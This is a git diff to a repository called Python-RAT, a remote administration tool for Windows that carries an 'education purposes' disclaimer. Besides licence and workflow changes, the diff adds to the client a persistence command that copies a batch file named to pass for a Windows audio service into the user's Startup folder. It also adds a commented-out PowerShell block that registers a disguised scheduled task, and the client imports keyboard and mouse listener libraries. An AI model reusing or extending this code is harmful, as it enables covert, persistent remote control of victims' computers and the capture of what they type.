diff --git a/.github/workflows/bandit.yml b/.github/workflows/bandit.yml new file mode 100644 index 0000000..36a7f2b --- /dev/null +++ b/.github/workflows/bandit.yml @@ -0,0 +1,52 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Bandit is a security linter designed to find common security issues in Python code. +# This action will run Bandit on your codebase. +# The results of the scan will be found under the Security tab of your repository. + +# https://github.com/marketplace/actions/bandit-scan is ISC licensed, by abirismyname +# https://pypi.org/project/bandit/ is Apache v2.0 licensed, by PyCQA + +name: Bandit +on: + push: + branches: [ "main" ] + pull_request: + # The branches below must be a subset of the branches above + branches: [ "main" ] + schedule: + - cron: '15 4 * * 3' + +jobs: + bandit: + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for github/codeql-action/upload-sarif to upload SARIF results + actions: read # only required for a private repository by github/codeql-action/upload-sarif to get the Action run status + + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Bandit Scan + uses: shundor/python-bandit-scan@9cc5aa4a006482b8a7f91134412df6772dbda22c + with: # optional arguments + # exit with 0, even with results found + exit_zero: true # optional, default is DEFAULT + # Github token of the repository (automatically created by Github) + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} # Needed to get PR information. + # File or directory to run bandit on + # path: # optional, default is . + # Report only issues of a given severity level or higher. Can be LOW, MEDIUM or HIGH. Default is UNDEFINED (everything) + # level: # optional, default is UNDEFINED + # Report only issues of a given confidence level or higher. Can be LOW, MEDIUM or HIGH. Default is UNDEFINED (everything) + # confidence: # optional, default is UNDEFINED + # comma-separated list of paths (glob patterns supported) to exclude from scan (note that these are in addition to the excluded paths provided in the config file) (default: .svn,CVS,.bzr,.hg,.git,__pycache__,.tox,.eggs,*.egg) + # excluded_paths: # optional, default is DEFAULT + # comma-separated list of test IDs to skip + # skips: # optional, default is DEFAULT + # path to a .bandit file that supplies command line arguments + # ini_path: # optional, default is DEFAULT + diff --git a/.github/workflows/manual.yml b/.github/workflows/manual.yml new file mode 100644 index 0000000..eadcbbc --- /dev/null +++ b/.github/workflows/manual.yml @@ -0,0 +1,30 @@ +# This is a basic workflow that is manually triggered + +name: Manual workflow + +# Controls when the action will run. Workflow runs when manually triggered using the UI +# or API. +on: + workflow_dispatch: + # Inputs the workflow accepts. + inputs: + name: + # Friendly description to be shown in the UI instead of 'name' + description: 'Dep Script Test' + # Default value if no value is explicitly provided + default: NO' + # Input has to be provided for the workflow to run + required: true + +# A workflow run is made up of one or more jobs that can run sequentially or in parallel +jobs: + # This workflow contains a single job called "greet" + greet: + # The type of runner that the job will run on + runs-on: windows + + # Steps represent a sequence of tasks that will be executed as part of the job + steps: + # Runs a single command using the runners shell + - name: Test Script + run: diff --git a/LICENCE.txt b/LICENCE.txt new file mode 100644 index 0000000..61ab961 --- /dev/null +++ b/LICENCE.txt @@ -0,0 +1 @@ +This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. diff --git a/LICENSE b/LICENSE deleted file mode 100644 index e266dae..0000000 --- a/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2022 FZGbzuw412 - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/README.md b/README.md index d44d550..701bbbc 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,7 @@ # Python-RAT + +THIS REPO IS ARCHIVED AND WILL NO LONGER BE UPDATED. + Advanced Remote Administration tool for Windows Systems written in pure Python ## Disclamer @@ -6,7 +9,7 @@ Advanced Remote Administration tool for Windows Systems written in pure Python THIS SOFTWARE IS INTENDED ONLY FOR EDUCATION PURPOSES! DO NOT USE IT TO INFLICT DAMAGE TO ANYONE! USING MY APPLICATION YOU ARE AUTHOMATICALLY AGREE WITH ALL RULES AND TAKE RESPONSIBITITY FOR YOUR ACTION! THE VIOLATION OF LAWS CAN CAUSE SERIOUS CONSEQUENCES! -THE DEVELOPER FZGbzuw412 ASSUMES NO LIABILITY AND IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE +THE DEVELOPER ASSUMES NO LIABILITY AND IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM. ## Intended for: @@ -57,23 +60,5 @@ client.pyw ![изображение](https://user-images.githubusercontent.com/92334349/151528715-c83b5d21-4df4-4143-acf4-a67907e180de.png) ## Licence - - Copyright (c) 2022 FZGbzuw412 - - Permission is hereby granted, free of charge, to any person obtaining a copy - of this software and associated documentation files (the "Software"), to deal - in the Software without restriction, including without limitation the rights - to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - copies of the Software, and to permit persons to whom the Software is - furnished to do so, subject to the following conditions: - - The above copyright notice and this permission notice shall be included in all - copies or substantial portions of the Software. - - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. + +This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000..4350bb0 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,5 @@ +# Security Policy + +## Reporting a Vulnerability + +Always Report Vulnerabilities In The Issues. Please Be Respectful When Reporting diff --git a/WindowsAudioService.bat b/WindowsAudioService.bat new file mode 100644 index 0000000..e670140 --- /dev/null +++ b/WindowsAudioService.bat @@ -0,0 +1 @@ +py "C:\Users\" \ No newline at end of file diff --git a/client.pyw b/client.pyw index 3ba0856..0a687e7 100644 --- a/client.pyw +++ b/client.pyw @@ -10,6 +10,7 @@ import shutil import glob import ctypes import sys +import os import webbrowser import re import pyautogui @@ -20,6 +21,8 @@ from pynput.keyboard import Listener from pynput.mouse import Controller import time import keyboard +import subprocess + user32 = ctypes.WinDLL('user32') kernel32 = ctypes.WinDLL('kernel32') @@ -599,6 +602,10 @@ User: {os.getlogin()} except: self.errorsend() + + elif command == 'AtStartup': + os.system('copy WindowsAudioService.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"') + elif command == 'exit': s.send(b"exit") break @@ -606,5 +613,26 @@ User: {os.getlogin()} rat = RAT_CLIENT('127.0.0.1', 4444) if __name__ == '__main__': + # Use triple quotes string literal to span PowerShell command multiline + #STR_CMD = """ + #$action = New-ScheduledTaskAction -Execute """ + sys.executable + """.exe -Argument """ + + """ + #$description = "" + #$settings = New-ScheduledTaskSettingsSet -RunOnlyIfNetworkAvailable + #$taskName = "Windows Remote Request Handler" + #$trigger = New-ScheduledTaskTrigger -AtStartup + #Register-ScheduledTask -TaskName $taskName -Description $description -Action $action -Settings $settings -Trigger $trigger | Out-Null + #""" + + # Use a list to make it easier to pass argument to subprocess + #listProcess = [ + # "powershell.exe", + # "-NoExit", + # "-NoProfile", + # "-Command", + # STR_CMD + #] + + # Enjoy the magic + #subprocess.run(listProcess, check=True) rat.build_connection() - rat.execute() \ No newline at end of file + rat.execute() diff --git a/client_requirements.txt b/client_requirements.txt index 55c8eab..164e72a 100644 --- a/client_requirements.txt +++ b/client_requirements.txt @@ -3,4 +3,7 @@ comtypes pycaw pyautogui opencv-python -vidstream \ No newline at end of file +vidstream +comtypes +pynput +keyboard \ No newline at end of file diff --git a/installwithargs.bat b/installwithargs.bat new file mode 100644 index 0000000..fe8b478 --- /dev/null +++ b/installwithargs.bat @@ -0,0 +1,2 @@ +python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org -r client_requirements.txt +python -m pip install --trusted-host pypi.org --trusted-host files.pythonhosted.org -r server_requirements.txt \ No newline at end of file